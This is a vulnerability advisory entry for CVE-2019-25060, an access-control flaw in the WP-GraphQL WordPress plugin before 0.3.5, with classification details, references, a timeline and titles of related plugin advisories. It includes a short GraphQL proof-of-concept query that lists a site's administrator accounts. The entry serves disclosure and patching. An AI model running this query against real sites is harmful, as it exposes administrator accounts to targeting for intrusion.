WP-GraphQL < 0.3.5 – Improper Access Control | CVE 2019-25060

Description

The plugin doesn't properly restrict access to information about other users' roles on the affected site. Because of this, a remote attacker could forge a GraphQL query to retrieve the account roles of every user on the site.

Proof of Concept

query getUsers{
  users(where:{role:ADMINISTRATOR}){
    edges{
      node{
        userId
        name
      }
    }
  }
}

Affects Plugins

wp-graphql

Fixed in 0.3.5

References

CVE

CVE-2019-25060

URL

https://github.com/wp-graphql/wp-graphql/pull/900

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CWE-284

CVSS

5.3 (medium)

Miscellaneous

Original Researcher

Rohan Pagey

Submitter

Rohan Pagey

Verified

Yes

WPVDB ID

393be73a-f8dc-462f-8670-f20ab89421fc

Timeline

Publicly Published

2019-07-10 (about 6 years ago)

Added

2022-05-02 (about 3 years ago)

Last Updated

2022-05-03 (about 3 years ago)

Other

Published

Title

Published

2023-08-14

Title

Advanced File Manager < 5.1.1 - Admin+ Arbitrary File/Folder Access

Published

2021-09-06

Title

Pinterest Automatic < 4.14.4 - Unauthenticated Arbitrary Options Update

Published

2021-07-07

Title

WP Upload Restriction < 2.2.5 - Missing Access Control in getSelectedMimeTypesByRole

Published

2025-02-24

Title

Enfold < 7.0 - Missing Authorization to Sensitive Information Disclosure in avia-export-class.php

Published

2024-01-16

Title

User Profile Builder < 3.10.9 - Missing Authorization to Plugin Settings Change via wppb_two_factor_authentication_settings_update